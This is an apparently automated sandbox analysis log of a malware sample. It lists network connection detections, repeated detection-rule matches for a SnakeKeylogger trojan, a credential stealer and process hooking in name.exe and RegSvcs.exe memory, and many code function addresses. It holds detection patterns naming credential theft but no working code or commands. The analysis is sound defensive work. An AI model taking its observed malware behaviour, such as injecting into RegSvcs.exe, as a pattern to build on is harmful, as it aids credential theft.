Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49743 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49741 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49712 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49727 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49725 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49741 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49743 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49719 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49722 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49719 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49715 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49715 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49712 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49732 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49732 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49724 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49728 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49744 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49708 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49728 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49727 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49725 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49724 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49737 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: 2.2.name.exe.3850000.1.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.name.exe.3850000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 2.2.name.exe.3850000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 2.2.name.exe.3850000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 2.2.name.exe.3850000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 2.2.name.exe.3850000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 6.2.name.exe.3c00000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 6.2.name.exe.3c00000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 6.2.name.exe.3c00000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 6.2.name.exe.3c00000.1.unpack, type: UNPACKEDPE |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 6.2.name.exe.3c00000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 6.2.name.exe.3c00000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 00000002.00000002.1429704895.0000000003850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects Encrial credential stealer malware Author: Florian Roth |
Source: 00000006.00000002.1572965635.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables with potential process hoocking Author: ditekSHen |
Source: 00000003.00000002.3792399239.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: name.exe PID: 7832, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: RegSvcs.exe PID: 7876, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: Process Memory Space: name.exe PID: 8132, type: MEMORYSTR |
Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_004096A0 |
0_2_004096A0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0042200C |
0_2_0042200C |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0041A217 |
0_2_0041A217 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00412216 |
0_2_00412216 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0042435D |
0_2_0042435D |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_004033C0 |
0_2_004033C0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0044F430 |
0_2_0044F430 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_004125E8 |
0_2_004125E8 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0044663B |
0_2_0044663B |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00413801 |
0_2_00413801 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0042096F |
0_2_0042096F |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_004129D0 |
0_2_004129D0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_004119E3 |
0_2_004119E3 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0041C9AE |
0_2_0041C9AE |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0047EA6F |
0_2_0047EA6F |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0040FA10 |
0_2_0040FA10 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0044EB5F |
0_2_0044EB5F |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00423C81 |
0_2_00423C81 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00411E78 |
0_2_00411E78 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00442E0C |
0_2_00442E0C |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00420EC0 |
0_2_00420EC0 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_0044CF17 |
0_2_0044CF17 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_00444FD2 |
0_2_00444FD2 |
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe |
Code function: 0_2_03F71B38 |
0_2_03F71B38 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 2_2_03FD9720 |
2_2_03FD9720 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1D27D |
3_2_02B1D27D |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B15362 |
3_2_02B15362 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B17118 |
3_2_02B17118 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1C146 |
3_2_02B1C146 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1C738 |
3_2_02B1C738 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1C468 |
3_2_02B1C468 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B169B0 |
3_2_02B169B0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1E988 |
3_2_02B1E988 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1CFB3 |
3_2_02B1CFB3 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1CCE3 |
3_2_02B1CCE3 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1F644 |
3_2_02B1F644 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1FA88 |
3_2_02B1FA88 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1CA28 |
3_2_02B1CA28 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B129EC |
3_2_02B129EC |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B139EE |
3_2_02B139EE |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B1E97B |
3_2_02B1E97B |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_02B13E09 |
3_2_02B13E09 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665E6B0 |
3_2_0665E6B0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06651E80 |
3_2_06651E80 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_066517A0 |
3_2_066517A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06659C70 |
3_2_06659C70 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06659548 |
3_2_06659548 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06650B30 |
3_2_06650B30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06655028 |
3_2_06655028 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06652968 |
3_2_06652968 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06651E70 |
3_2_06651E70 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665DE00 |
3_2_0665DE00 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665E6AF |
3_2_0665E6AF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665EF60 |
3_2_0665EF60 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665178F |
3_2_0665178F |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06659C6D |
3_2_06659C6D |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665FC68 |
3_2_0665FC68 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665CCA0 |
3_2_0665CCA0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665D540 |
3_2_0665D540 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665D550 |
3_2_0665D550 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665DDFF |
3_2_0665DDFF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665E24A |
3_2_0665E24A |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665E258 |
3_2_0665E258 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665EAF8 |
3_2_0665EAF8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06650B20 |
3_2_06650B20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665EB08 |
3_2_0665EB08 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06658BA0 |
3_2_06658BA0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665F3B8 |
3_2_0665F3B8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06658B90 |
3_2_06658B90 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06650040 |
3_2_06650040 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_06650006 |
3_2_06650006 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665F802 |
3_2_0665F802 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665F810 |
3_2_0665F810 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665501B |
3_2_0665501B |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665D0F8 |
3_2_0665D0F8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665295B |
3_2_0665295B |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665D9A7 |
3_2_0665D9A7 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 3_2_0665D9A8 |
3_2_0665D9A8 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_004096A0 |
6_2_004096A0 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0042200C |
6_2_0042200C |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0041A217 |
6_2_0041A217 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00412216 |
6_2_00412216 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0042435D |
6_2_0042435D |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_004033C0 |
6_2_004033C0 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0044F430 |
6_2_0044F430 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_004125E8 |
6_2_004125E8 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0044663B |
6_2_0044663B |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00413801 |
6_2_00413801 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0042096F |
6_2_0042096F |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_004129D0 |
6_2_004129D0 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_004119E3 |
6_2_004119E3 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0041C9AE |
6_2_0041C9AE |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0047EA6F |
6_2_0047EA6F |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0040FA10 |
6_2_0040FA10 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0044EB5F |
6_2_0044EB5F |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00423C81 |
6_2_00423C81 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00411E78 |
6_2_00411E78 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00442E0C |
6_2_00442E0C |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00420EC0 |
6_2_00420EC0 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_0044CF17 |
6_2_0044CF17 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_00444FD2 |
6_2_00444FD2 |
Source: C:\Users\user\AppData\Local\directory\name.exe |
Code function: 6_2_03EB16D8 |
6_2_03EB16D8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00542154 |
7_2_00542154 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00542148 |
7_2_00542148 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00543960 |
7_2_00543960 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0054A1B0 |
7_2_0054A1B0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00540B88 |
7_2_00540B88 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00541E38 |
7_2_00541E38 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00543710 |
7_2_00543710 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084C147 |
7_2_0084C147 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084D278 |
7_2_0084D278 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00845362 |
7_2_00845362 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084C473 |
7_2_0084C473 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084C738 |
7_2_0084C738 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084E988 |
7_2_0084E988 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_008469A0 |
7_2_008469A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084CA08 |
7_2_0084CA08 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084CCD8 |
7_2_0084CCD8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00849DE0 |
7_2_00849DE0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00843E09 |
7_2_00843E09 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084CFAA |
7_2_0084CFAA |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00846FC8 |
7_2_00846FC8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084F631 |
7_2_0084F631 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_008429EC |
7_2_008429EC |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084E97B |
7_2_0084E97B |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_0084FA88 |
7_2_0084FA88 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_00843AB8 |
7_2_00843AB8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB9548 |
7_2_05DB9548 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB9C18 |
7_2_05DB9C18 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB17A0 |
7_2_05DB17A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB1E80 |
7_2_05DB1E80 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB2968 |
7_2_05DB2968 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB5028 |
7_2_05DB5028 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB0B30 |
7_2_05DB0B30 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBDDFF |
7_2_05DBDDFF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBD550 |
7_2_05DBD550 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBD540 |
7_2_05DBD540 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBCC8F |
7_2_05DBCC8F |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBCCA0 |
7_2_05DBCCA0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBFC68 |
7_2_05DBFC68 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB178F |
7_2_05DB178F |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBEF51 |
7_2_05DBEF51 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBEF60 |
7_2_05DBEF60 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBE6B0 |
7_2_05DBE6B0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBE6AF |
7_2_05DBE6AF |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB1E70 |
7_2_05DB1E70 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBDE00 |
7_2_05DBDE00 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBD999 |
7_2_05DBD999 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBD9A8 |
7_2_05DBD9A8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB295B |
7_2_05DB295B |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBD0F8 |
7_2_05DBD0F8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB0040 |
7_2_05DB0040 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB5018 |
7_2_05DB5018 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBF810 |
7_2_05DBF810 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBF801 |
7_2_05DBF801 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB003F |
7_2_05DB003F |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBF3B8 |
7_2_05DBF3B8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBF3A8 |
7_2_05DBF3A8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB8BA0 |
7_2_05DB8BA0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBEB08 |
7_2_05DBEB08 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DB0B20 |
7_2_05DB0B20 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBEAF8 |
7_2_05DBEAF8 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBE258 |
7_2_05DBE258 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Code function: 7_2_05DBE249 |
7_2_05DBE249 |
Source: 2.2.name.exe.3850000.1.unpack, type: UNPACKEDPE |
